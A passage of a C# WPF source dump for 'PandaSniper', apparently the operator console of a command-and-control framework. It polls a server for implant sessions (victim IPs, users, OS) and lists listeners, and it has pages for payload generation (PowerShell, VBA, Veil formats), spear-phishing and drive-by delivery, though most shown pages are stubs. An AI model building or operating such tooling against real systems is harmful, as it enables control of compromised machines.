MainPage Mainpage; 33 | public MainPayload Payloadpage; 34 | public MainSetting Settingpage; 35 | 36 | public UserProfile userProfile; 37 | 38 | public ObservableCollection listeners = new ObservableCollection() { }; 39 | 40 | //public List targetListViews = new List(); 41 | 42 | public MainWindow() 43 | { 44 | InitializeComponent(); 45 | } 46 | 47 | public class GetImplantResultClass 48 | { 49 | public UserProfile userProfile; 50 | public AsyncObservableCollection targetListViews; 51 | public EventsContent eventsContent; 52 | //public ListView BodySessionListView; 53 | 54 | 55 | public void GetImplantResult() 56 | { 57 | DataFormat MessageData; 58 | MessageData.type = "1"; 59 | MessageData.token = userProfile.token; 60 | MessageData.data = null; 61 | string sendMessage = JsonConvert.SerializeObject(MessageData); 62 | bool isGo = true; 63 | Thread.CurrentThread.IsBackground = true; 64 | SslTcpClient sslTcpClient = userProfile.sslTcpClient; 65 | do 66 | { 67 | SslStream sslStream = sslTcpClient.SendMessage(sendMessage); 68 | sslTcpClient.ReadMessage(sslStream); 69 | JObject rMJson = (JObject)JsonConvert.DeserializeObject(sslTcpClient.resultMessage); 70 | if (rMJson["code"].ToString() == "200") 71 | { 72 | foreach (var item in rMJson["result"]) 73 | { 74 | TimeSpan ts = DateTime.Now - Function.GetDateTime(item["time"].ToString()); 75 | string invalTs = ts.Seconds.ToString() + "s"; 76 | 77 | if (ts.Minutes != 0) 78 | { 79 | invalTs = ts.Minutes.ToString() + "m " + invalTs; 80 | if (ts.Hours != 0) 81 | { 82 | invalTs = ts.Hours.ToString() + "h " + invalTs; 83 | if (ts.Days != 0) 84 | { 85 | invalTs = ts.Days.ToString() + "d " + invalTs; 86 | } 87 | } 88 | } 89 | 90 | TargetListView tLV = new TargetListView( 91 | item["country"].ToString(), 92 | item["ip"].ToString(), 93 | item["innerip"].ToString(), 94 | item["pid"].ToString(), 95 | item["user"].ToString(), 96 | item["osinfo"].ToString(), 97 | item["cpuinfo"].ToString(), 98 | invalTs 99 | ) 100 | { 101 | uid = item["uid"].ToString(), 102 | time = item["time"].ToString() 103 | }; 104 | //Console.WriteLine(Function.GetDateTime(item["time"].ToString()).ToString()); 105 | bool isE = false; 106 | foreach(TargetListView tlv in targetListViews) 107 | { 108 | if(tlv.uid == tLV.uid) 109 | { 110 | if (tlv.Country != tLV.Country) 111 | { 112 | targetListViews.ElementAt(targetListViews.IndexOf(tlv)).Country = tLV.Country; 113 | } 114 | 115 | if (tlv.ExternalIP != tLV.ExternalIP) 116 | { 117 | targetListViews.ElementAt(targetListViews.IndexOf(tlv)).ExternalIP = tLV.ExternalIP; 118 | } 119 | if (tlv.InternalIP != tLV.InternalIP) 120 | { 121 | targetListViews.ElementAt(targetListViews.IndexOf(tlv)).InternalIP = tLV.InternalIP; 122 | } 123 | if (tlv.Pid != tLV.Pid) 124 | { 125 | targetListViews.ElementAt(targetListViews.IndexOf(tlv)).Pid = tLV.Pid; 126 | } 127 | if (tlv.User != tLV.User) 128 | { 129 | targetListViews.ElementAt(targetListViews.IndexOf(tlv)).User = tLV.User; 130 | } 131 | if (tlv.Computer != tLV.Computer) 132 | { 133 | targetListViews.ElementAt(targetListViews.IndexOf(tlv)).Computer = tLV.Computer; 134 | } 135 | if (tlv.Arch != tLV.Arch) 136 | { 137 | targetListViews.ElementAt(targetListViews.IndexOf(tlv)).Arch = tLV.Arch; 138 | } 139 | //if (tlv.time != tLV.time) 140 | //{ 141 | targetListViews.ElementAt(targetListViews.IndexOf(tlv)).Last = tLV.Last; 142 | //} 143 | isE = true; 144 | } 145 | } 146 | if(isE == false || targetListViews.Count == 0) 147 | { 148 | targetListViews.Add(tLV); 149 | string events = "[" + tLV.Country + "] " + Function.GetDateTime(tLV.time).ToString() + " " + tLV.InternalIP + "(" + tLV.computer.Trim() + ") Online"; 150 | if(eventsContent.Content == "") 151 | { 152 | eventsContent.Content = events + "\n"; 153 | } 154 | else 155 | { 156 | eventsContent.Content = eventsContent.Content + events + "\n"; 157 | } 158 | //this.BodySessionListView.Dispatcher.Invoke(new Action(() => { this.BodySessionListView.Items.Clear(); this.BodySessionListView.ItemsSource = this.targetListViews; })); 159 | } 160 | } 161 | //Thread.Sleep(1000); 162 | } 163 | } while (isGo); 164 | 165 | } 166 | } 167 | 168 | private void Window_Loaded(object sender, RoutedEventArgs e) 169 | { 170 | this.Mainpage = new MainPage(); 171 | this.Payloadpage = new MainPayload(); 172 | this.Settingpage = new MainSetting(); 173 | 174 | // 175 | this.Mainpage.userProfile = this.userProfile; 176 | this.Payloadpage.userProfile = this.userProfile; 177 | this.Payloadpage.listeners = this.listeners; 178 | 179 | ChangePage.Content = new Frame() 180 | { 181 | Content = this.Mainpage 182 | }; 183 | //检测是否有listeners并拉去 184 | 185 | DataFormat MessageData; 186 | MessageData.type = "6"; 187 | MessageData.token = userProfile.token; 188 | MessageData.data = null; 189 | string sendMessage = JsonConvert.SerializeObject(MessageData); 190 | userProfile.sslTcpClient.ReadMessage(userProfile.sslTcpClient.SendMessage(sendMessage)); 191 | JObject rMJson = (JObject)JsonConvert.DeserializeObject(userProfile.sslTcpClient.resultMessage); 192 | if (rMJson["code"].ToString() == "200") 193 | { 194 | foreach (var item in rMJson["result"]) 195 | { 196 | if ((bool)item["status"]) 197 | { 198 | ListenersListView LLV = new ListenersListView( 199 | Function.GenerateRandomString(6), 200 | "", 201 | "", 202 | "", 203 | item["port"].ToString(), 204 | "", 205 | "", 206 | "", 207 | "" 208 | ) 209 | { 210 | }; 211 | this.listeners.Add(LLV); 212 | } 213 | 214 | //Console.WriteLine(Function.GetDateTime(item["time"].ToString()).ToString()); 215 | } 216 | //Thread.Sleep(1000); 217 | } 218 | else if(rMJson["code"].ToString() == "500") 219 | { 220 | MessageBox.Show(rMJson["error"].ToString()); 221 | } 222 | else if (rMJson["code"].ToString() == "401") 223 | { 224 | MessageBox.Show(rMJson["error"].ToString()); 225 | } 226 | 227 | //拉取implant 228 | AsyncObservableCollection targetListViews = new AsyncObservableCollection(); 229 | this.Mainpage.BodySessionListView.ItemsSource = targetListViews; 230 | 231 | EventsContent eventsContent = new EventsContent() { }; 232 | this.Mainpage.EventsTextBox.DataContext = eventsContent; 233 | 234 | GetImplantResultClass myThread = new GetImplantResultClass 235 | { 236 | userProfile = this.userProfile, 237 | targetListViews = targetListViews, 238 | eventsContent = eventsContent 239 | //BodySessionListView = this.Mainpage.BodySessionListView 240 | }; 241 | 242 | 243 | Thread thread = new Thread(myThread.GetImplantResult); 244 | thread.Start(); 245 | 246 | 247 | 248 | //Console.WriteLine(this.userProfile.sslTcpClient.resultMessage); 249 | } 250 | 251 | private void AutoSizeWindow() 252 | { 253 | this.Mainpage.AutoSizeWindow(); 254 | this.Payloadpage.AutoSizeWindow(); 255 | } 256 | 257 | 258 | private void WindowTitle_MouseMove(object sender, MouseEventArgs e) 259 | { 260 | if (e.LeftButton == MouseButtonState.Pressed) 261 | { 262 | this.DragMove(); 263 | } 264 | } 265 | 266 | int i = 0; 267 | private void WindowTitle_MouseDown(object sender, MouseButtonEventArgs e) 268 | { 269 | 270 | i += 1; 271 | System.Windows.Threading.DispatcherTimer timer = new System.Windows.Threading.DispatcherTimer 272 | { 273 | Interval = new TimeSpan(0, 0, 0, 0, 300) 274 | }; 275 | timer.Tick += (s, e1) => { timer.IsEnabled = false; i = 0; }; 276 | timer.IsEnabled = true; 277 | if (i % 2 == 0) 278 | { 279 | timer.IsEnabled = false; 280 | i = 0; 281 | if (IsWindowMaxSize()) 282 | { 283 | ToWindowNormal(); 284 | } 285 | else 286 | { 287 | ToWindowMaxSize(); 288 | } 289 | } 290 | } 291 | 292 | private void WindowClose_MouseEnter(object sender, MouseEventArgs e) 293 | { 294 | 295 | this.WindowCloseIcon.Visibility = Visibility.Visible; 296 | this.WindowMinSizeIcon.Visibility = Visibility.Visible; 297 | this.WindowMaxSizeIcon.Visibility = Visibility.Visible; 298 | } 299 | private void WindowClose_MouseLeave(object sender, MouseEventArgs e) 300 | { 301 | 302 | this.WindowCloseIcon.Visibility = Visibility.Hidden; 303 | this.WindowMinSizeIcon.Visibility = Visibility.Hidden; 304 | this.WindowMaxSizeIcon.Visibility = Visibility.Hidden; 305 | } 306 | 307 | private void WindowMinSize_MouseEnter(object sender, MouseEventArgs e) 308 | { 309 | 310 | this.WindowCloseIcon.Visibility = Visibility.Visible; 311 | this.WindowMinSizeIcon.Visibility = Visibility.Visible; 312 | this.WindowMaxSizeIcon.Visibility = Visibility.Visible; 313 | } 314 | private void WindowMinSize_MouseLeave(object sender, MouseEventArgs e) 315 | { 316 | this.WindowCloseIcon.Visibility = Visibility.Hidden; 317 | this.WindowMinSizeIcon.Visibility = Visibility.Hidden; 318 | this.WindowMaxSizeIcon.Visibility = Visibility.Hidden; 319 | } 320 | 321 | private void WindowMaxSize_MouseEnter(object sender, MouseEventArgs e) 322 | { 323 | 324 | this.WindowCloseIcon.Visibility = Visibility.Visible; 325 | this.WindowMinSizeIcon.Visibility = Visibility.Visible; 326 | this.WindowMaxSizeIcon.Visibility = Visibility.Visible; 327 | } 328 | private void WindowMaxSize_MouseLeave(object sender, MouseEventArgs e) 329 | { 330 | this.WindowCloseIcon.Visibility = Visibility.Hidden; 331 | this.WindowMinSizeIcon.Visibility = Visibility.Hidden; 332 | this.WindowMaxSizeIcon.Visibility = Visibility.Hidden; 333 | } 334 | 335 | private void WindowClose_Click(object sender, RoutedEventArgs e) 336 | { 337 | this.Close(); 338 | } 339 | 340 | private void WindowMinSize_Click(object sender, RoutedEventArgs e) 341 | { 342 | this.WindowState = WindowState.Minimized; 343 | } 344 | 345 | private void WindowMaxSize_Click(object sender, RoutedEventArgs e) 346 | { 347 | if (IsWindowMaxSize()) 348 | { 349 | ToWindowNormal(); 350 | } 351 | else 352 | { 353 | ToWindowMaxSize(); 354 | } 355 | } 356 | 357 | private void ToWindowNormal() 358 | { 359 | this.Height = 720; 360 | this.Width = 1080; 361 | this.Left = (SystemParameters.WorkArea.Width - 1080) / 2; 362 | this.Top = (SystemParameters.WorkArea.Height - 720) / 2; 363 | this.AutoSizeWindow(); 364 | } 365 | 366 | private void ToWindowMaxSize() 367 | { 368 | this.Left = 0; 369 | this.Top = 0; 370 | this.Height = SystemParameters.WorkArea.Height; 371 | this.Width = SystemParameters.WorkArea.Width; 372 | AutoSizeWindow(); 373 | } 374 | 375 | private Boolean IsWindowMaxSize() 376 | { 377 | if (this.Height == SystemParameters.WorkArea.Height && this.Width == SystemParameters.WorkArea.Width) 378 | { 379 | return true; 380 | } 381 | else 382 | { 383 | return false; 384 | } 385 | 386 | } 387 | 388 | //菜单栏相关事件 389 | private void MenuMainPage_MouseEnter(object sender, RoutedEventArgs e) 390 | { 391 | this.MenuMainPageIcon.Foreground = new SolidColorBrush(Colors.White); 392 | } 393 | 394 | private void MenuMainPage_MouseLeave(object sender, RoutedEventArgs e) 395 | { 396 | this.MenuMainPageIcon.Foreground = new SolidColorBrush((Color)ColorConverter.ConvertFromString("#FF686868")); 397 | } 398 | 399 | private void MenuMainPage_Click(object sender, RoutedEventArgs e) 400 | { 401 | if (this.Mainpage == null) 402 | { 403 | this.Mainpage = new MainPage(); 404 | } 405 | ChangePage.Content = new Frame() 406 | { 407 | 408 | Content = this.Mainpage 409 | }; 410 | } 411 | 412 | private void MenuMainPayload_MouseEnter(object sender, RoutedEventArgs e) 413 | { 414 | this.MenuMainPayloadIcon.Foreground = new SolidColorBrush(Colors.White); 415 | } 416 | 417 | private void MenuMainPayload_MouseLeave(object sender, RoutedEventArgs e) 418 | { 419 | this.MenuMainPayloadIcon.Foreground = new SolidColorBrush((Color)ColorConverter.ConvertFromString("#FF686868")); 420 | } 421 | 422 | private void MenuMainPayload_Click(object sender, RoutedEventArgs e) 423 | { 424 | if (this.Payloadpage == null) 425 | { 426 | this.Payloadpage = new MainPayload(); 427 | } 428 | ChangePage.Content = new Frame() 429 | { 430 | 431 | Content = this.Payloadpage 432 | }; 433 | } 434 | 435 | private void MenuMainSetting_MouseEnter(object sender, RoutedEventArgs e) 436 | { 437 | this.MenuMainSettingIcon.Foreground = new SolidColorBrush(Colors.White); 438 | } 439 | 440 | private void MenuMainSetting_MouseLeave(object sender, RoutedEventArgs e) 441 | { 442 | this.MenuMainSettingIcon.Foreground = new SolidColorBrush((Color)ColorConverter.ConvertFromString("#FF686868")); 443 | } 444 | 445 | private void MenuMainSetting_Click(object sender, RoutedEventArgs e) 446 | { 447 | if (this.Settingpage == null) 448 | { 449 | this.Settingpage = new MainSetting(); 450 | } 451 | ChangePage.Content = new Frame() 452 | { 453 | 454 | Content = this.Settingpage 455 | }; 456 | } 457 | 458 | 459 | 460 | 461 | } 462 | } 463 | -------------------------------------------------------------------------------- /Master/PandaSniper/Md5.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Security.Cryptography; 5 | using System.Text; 6 | using System.Threading.Tasks; 7 | 8 | namespace PandaSniper 9 | { 10 | class Md5 11 | { 12 | public static string EncryptString(string str) 13 | { 14 | MD5 md5 = MD5.Create(); 15 | // 将字符串转换成字节数组 16 | byte[] byteOld = Encoding.UTF8.GetBytes(str); 17 | // 调用加密方法 18 | byte[] byteNew = md5.ComputeHash(byteOld); 19 | // 将加密结果转换为字符串 20 | StringBuilder sb = new StringBuilder(); 21 | foreach (byte b in byteNew) 22 | { 23 | // 将字节转换成16进制表示的字符串, 24 | sb.Append(b.ToString("x2")); 25 | } 26 | // 返回加密的字符串 27 | return sb.ToString(); 28 | } 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /Master/PandaSniper/Packages.xaml: -------------------------------------------------------------------------------- 1 |  11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 29 | 30 | Packages 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /Master/PandaSniper/Packages.xaml.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Windows; 7 | using System.Windows.Controls; 8 | using System.Windows.Data; 9 | using System.Windows.Documents; 10 | using System.Windows.Input; 11 | using System.Windows.Media; 12 | using System.Windows.Media.Imaging; 13 | using System.Windows.Navigation; 14 | using System.Windows.Shapes; 15 | 16 | namespace PandaSniper 17 | { 18 | /// 19 | /// Packages.xaml 的交互逻辑 20 | /// 21 | public partial class Packages : Page 22 | { 23 | public Packages() 24 | { 25 | InitializeComponent(); 26 | } 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /Master/PandaSniper/PandaSniper.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | Debug 7 | AnyCPU 8 | {6EEAC8E1-443F-4934-91C3-0B806FA3DC0D} 9 | WinExe 10 | PandaSniper 11 | PandaSniper 12 | v4.6 13 | 512 14 | {60dc8134-eba5-43b8-bcc9-bb4bc16c2548};{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC} 15 | 4 16 | true 17 | true 18 | 19 | 20 | false 21 | publish\ 22 | true 23 | Disk 24 | false 25 | Foreground 26 | 7 27 | Days 28 | false 29 | false 30 | true 31 | 0 32 | 1.0.0.%2a 33 | false 34 | true 35 | 36 | 37 | AnyCPU 38 | true 39 | full 40 | false 41 | bin\Debug\ 42 | DEBUG;TRACE 43 | prompt 44 | 4 45 | 46 | 47 | AnyCPU 48 | pdbonly 49 | true 50 | bin\Release\ 51 | TRACE 52 | prompt 53 | 4 54 | 55 | 56 | l.ico 57 | 58 | 59 | 60 | 61 | 62 | 63 | ..\packages\MaterialDesignColors.1.2.1\lib\net45\MaterialDesignColors.dll 64 | 65 | 66 | ..\packages\MaterialDesignThemes.3.0.0\lib\net45\MaterialDesignThemes.Wpf.dll 67 | 68 | 69 | ..\packages\Newtonsoft.Json.12.0.3\lib\net45\Newtonsoft.Json.dll 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 4.0 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | MSBuild:Compile 90 | Designer 91 | 92 | 93 | AddListener.xaml 94 | 95 | 96 | 97 | 98 | 99 | LinuxExecutableS.xaml 100 | 101 | 102 | 103 | LoginWindow.xaml 104 | 105 | 106 | 107 | SpearPhish.xaml 108 | 109 | 110 | 111 | 112 | WebDriveBy.xaml 113 | 114 | 115 | Designer 116 | MSBuild:Compile 117 | 118 | 119 | Designer 120 | MSBuild:Compile 121 | 122 | 123 | Designer 124 | MSBuild:Compile 125 | 126 | 127 | Designer 128 | MSBuild:Compile 129 | 130 | 131 | Designer 132 | MSBuild:Compile 133 | 134 | 135 | Designer 136 | MSBuild:Compile 137 | 138 | 139 | Designer 140 | MSBuild:Compile 141 | 142 | 143 | MSBuild:Compile 144 | Designer 145 | 146 | 147 | App.xaml 148 | Code 149 | 150 | 151 | LinuxExecutable.xaml 152 | 153 | 154 | MainPage.xaml 155 | 156 | 157 | MainPayload.xaml 158 | 159 | 160 | MainSetting.xaml 161 | 162 | 163 | MainWindow.xaml 164 | Code 165 | 166 | 167 | Designer 168 | MSBuild:Compile 169 | 170 | 171 | Designer 172 | MSBuild:Compile 173 | 174 | 175 | Designer 176 | MSBuild:Compile 177 | 178 | 179 | Designer 180 | MSBuild:Compile 181 | 182 | 183 | 184 | 185 | Packages.xaml 186 | 187 | 188 | PayloadGeneragor.xaml 189 | 190 | 191 | Code 192 | 193 | 194 | True 195 | True 196 | Resources.resx 197 | 198 | 199 | True 200 | Settings.settings 201 | True 202 | 203 | 204 | ResXFileCodeGenerator 205 | Resources.Designer.cs 206 | 207 | 208 | 209 | SettingsSingleFileGenerator 210 | Settings.Designer.cs 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | False 219 | Microsoft .NET Framework 4.6 %28x86 和 x64%29 220 | true 221 | 222 | 223 | False 224 | .NET Framework 3.5 SP1 225 | false 226 | 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | 236 | 237 | 238 | 这台计算机上缺少此项目引用的 NuGet 程序包。使用“NuGet 程序包还原”可下载这些程序包。有关更多信息,请参见 http://go.microsoft.com/fwlink/?LinkID=322105。缺少的文件是 {0}。 239 | 240 | 241 | 242 | 243 | -------------------------------------------------------------------------------- /Master/PandaSniper/PandaSniper.csproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | publish\ 5 | 6 | 7 | 8 | 9 | 10 | zh-CN 11 | false 12 | 13 | -------------------------------------------------------------------------------- /Master/PandaSniper/PayloadGeneragor.xaml: -------------------------------------------------------------------------------- 1 |  11 | 12 | 33 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 90 | 94 | 95 | 96 | 97 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 112 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 158 | 234 | 235 | 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | 244 | 245 | 246 | 253 | 254 | PayloadGeneragor 259 | 260 | 261 | 262 | 263 | 264 | 265 | 266 | 267 | 268 | 269 | 274 | This panel generates a payload to stage a Panda Sniper listener. Several output options are available. 275 | 276 | 277 | 278 | 279 | 280 | 281 | 282 | 283 | 286 | 287 | 290 | 291 | 292 | 293 | 296 | 297 | 300 | 301 | 304 | 305 | 306 | 313 | 314 | HTTPS-443 315 | 316 | 317 | HTTP-80 318 | 319 | 320 | DNS-53 321 | 322 | 323 | TCP-8888 324 | 325 | 326 | 327 | 328 | 329 | 330 | 331 | 332 | 333 | 334 | 337 | 338 | 341 | 342 | 343 | 344 | 347 | 348 | 351 | 352 | 353 | 360 | 361 | C 362 | 363 | 364 | C# 365 | 366 | 367 | COM Scriptlet 368 | 369 | 370 | Java 371 | 372 | 373 | PowerShell 374 | 375 | 376 | PowerShell Command 377 | 378 | 379 | Python 380 | 381 | 382 | Raw 383 | 384 | 385 | Ruby 386 | 387 | 388 | Veil 389 | 390 | 391 | VBA 392 | 393 | 394 | 395 | 396 | 397 | 398 | 399 | 400 | 401 | 404 | 405 | 408 | 409 | 410 | 411 | 412 | 415 | 416 | 417 | 418 | 419 | 420 | 421 | 440 | 441 | 442 | 443 | 444 | 445 | 446 | -------------------------------------------------------------------------------- /Master/PandaSniper/PayloadGeneragor.xaml.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Windows; 7 | using System.Windows.Controls; 8 | using System.Windows.Data; 9 | using System.Windows.Documents; 10 | using System.Windows.Input; 11 | using System.Windows.Media; 12 | using System.Windows.Media.Imaging; 13 | using System.Windows.Navigation; 14 | using System.Windows.Shapes; 15 | 16 | namespace PandaSniper 17 | { 18 | /// 19 | /// PayloadGeneragor.xaml 的交互逻辑 20 | /// 21 | public partial class PayloadGeneragor : Page 22 | { 23 | public PayloadGeneragor() 24 | { 25 | InitializeComponent(); 26 | } 27 | 28 | private void PayloadGeneragorAdd_MouseEnter(object sender, MouseEventArgs e) 29 | { 30 | 31 | } 32 | 33 | private void PayloadGeneragorAdd_MouseLeave(object sender, MouseEventArgs e) 34 | { 35 | 36 | } 37 | 38 | private void PayloadGeneragorAdd_Click(object sender, RoutedEventArgs e) 39 | { 40 | 41 | } 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /Master/PandaSniper/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Resources; 3 | using System.Runtime.CompilerServices; 4 | using System.Runtime.InteropServices; 5 | using System.Windows; 6 | 7 | // 有关程序集的一般信息由以下 8 | // 控制。更改这些特性值可修改 9 | // 与程序集关联的信息。 10 | [assembly: AssemblyTitle("PandaSniper")] 11 | [assembly: AssemblyDescription("")] 12 | [assembly: AssemblyConfiguration("")] 13 | [assembly: AssemblyCompany("")] 14 | [assembly: AssemblyProduct("PandaSniper")] 15 | [assembly: AssemblyCopyright("Copyright © 2019")] 16 | [assembly: AssemblyTrademark("")] 17 | [assembly: AssemblyCulture("")] 18 | 19 | // 将 ComVisible 设置为 false 会使此程序集中的类型 20 | //对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型 21 | //请将此类型的 ComVisible 特性设置为 true。 22 | [assembly: ComVisible(false)] 23 | 24 | //若要开始生成可本地化的应用程序,请设置 25 | //.csproj 文件中的 CultureYouAreCodingWith 26 | //例如,如果您在源文件中使用的是美国英语, 27 | //使用的是美国英语,请将 设置为 en-US。 然后取消 28 | //对以下 NeutralResourceLanguage 特性的注释。 更新 29 | //以下行中的“en-US”以匹配项目文件中的 UICulture 设置。 30 | 31 | //[assembly: NeutralResourcesLanguage("en-US", UltimateResourceFallbackLocation.Satellite)] 32 | 33 | 34 | [assembly: ThemeInfo( 35 | ResourceDictionaryLocation.None, //主题特定资源词典所处位置 36 | //(未在页面中找到资源时使用, 37 | //或应用程序资源字典中找到时使用) 38 | ResourceDictionaryLocation.SourceAssembly //常规资源词典所处位置 39 | //(未在页面中找到资源时使用, 40 | //、应用程序或任何主题专用资源字典中找到时使用) 41 | )] 42 | 43 | 44 | // 程序集的版本信息由下列四个值组成: 45 | // 46 | // 主版本 47 | // 次版本 48 | // 生成号 49 | // 修订号 50 | // 51 | //可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值 52 | //通过使用 "*",如下所示: 53 | // [assembly: AssemblyVersion("1.0.*")] 54 | [assembly: AssemblyVersion("1.0.0.0")] 55 | [assembly: AssemblyFileVersion("1.0.0.0")] 56 | -------------------------------------------------------------------------------- /Master/PandaSniper/Properties/Resources.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // 此代码由工具生成。 4 | // 运行时版本: 4.0.30319.42000 5 | // 6 | // 对此文件的更改可能导致不正确的行为,如果 7 | // 重新生成代码,则所做更改将丢失。 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace PandaSniper.Properties 12 | { 13 | 14 | 15 | /// 16 | /// 强类型资源类,用于查找本地化字符串等。 17 | /// 18 | // 此类是由 StronglyTypedResourceBuilder 19 | // 类通过类似于 ResGen 或 Visual Studio 的工具自动生成的。 20 | // 若要添加或删除成员,请编辑 .ResX 文件,然后重新运行 ResGen 21 | // (以 /str 作为命令选项),或重新生成 VS 项目。 22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")] 23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 25 | internal class Resources 26 | { 27 | 28 | private static global::System.Resources.ResourceManager resourceMan; 29 | 30 | private static global::System.Globalization.CultureInfo resourceCulture; 31 | 32 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] 33 | internal Resources() 34 | { 35 | } 36 | 37 | /// 38 | /// 返回此类使用的缓存 ResourceManager 实例。 39 | /// 40 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 41 | internal static global::System.Resources.ResourceManager ResourceManager 42 | { 43 | get 44 | { 45 | if ((resourceMan == null)) 46 | { 47 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("PandaSniper.Properties.Resources", typeof(Resources).Assembly); 48 | resourceMan = temp; 49 | } 50 | return resourceMan; 51 | } 52 | } 53 | 54 | /// 55 | /// 覆盖当前线程的 CurrentUICulture 属性 56 | /// 使用此强类型的资源类的资源查找。 57 | /// 58 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 59 | internal static global::System.Globalization.CultureInfo Culture 60 | { 61 | get 62 | { 63 | return resourceCulture; 64 | } 65 | set 66 | { 67 | resourceCulture = value; 68 | } 69 | } 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /Master/PandaSniper/Properties/Resources.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | text/microsoft-resx 107 | 108 | 109 | 2.0 110 | 111 | 112 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 113 | 114 | 115 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | -------------------------------------------------------------------------------- /Master/PandaSniper/Properties/Settings.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace PandaSniper.Properties 12 | { 13 | 14 | 15 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 16 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0")] 17 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase 18 | { 19 | 20 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings()))); 21 | 22 | public static Settings Default 23 | { 24 | get 25 | { 26 | return defaultInstance; 27 | } 28 | } 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /Master/PandaSniper/Properties/Settings.settings: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /Master/PandaSniper/SpearPhish.xaml: -------------------------------------------------------------------------------- 1 |  10 | 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /Master/PandaSniper/SpearPhish.xaml.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Windows; 7 | using System.Windows.Controls; 8 | using System.Windows.Data; 9 | using System.Windows.Documents; 10 | using System.Windows.Input; 11 | using System.Windows.Media; 12 | using System.Windows.Media.Imaging; 13 | using System.Windows.Navigation; 14 | using System.Windows.Shapes; 15 | 16 | namespace PandaSniper 17 | { 18 | /// 19 | /// SpearPhish.xaml 的交互逻辑 20 | /// 21 | public partial class SpearPhish : Page 22 | { 23 | public SpearPhish() 24 | { 25 | InitializeComponent(); 26 | } 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /Master/PandaSniper/SslTcpClient.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Collections; 7 | using System.Net; 8 | using System.Net.Security; 9 | using System.Net.Sockets; 10 | using System.Security.Authentication; 11 | using System.Security.Cryptography.X509Certificates; 12 | using System.IO; 13 | 14 | namespace PandaSniper 15 | { 16 | public class SslTcpClient 17 | { 18 | public string machineName = null; 19 | public int machinePort = 443; 20 | public string serverName = null; 21 | public TcpClient tcpClient = null; 22 | public SslStream sslStream = null; 23 | public string resultMessage = null; 24 | 25 | //private static Hashtable certificateErrors = new Hashtable(); 26 | //构造函数 27 | public SslTcpClient(string machineName, int machinePort, string serverName) 28 | { 29 | 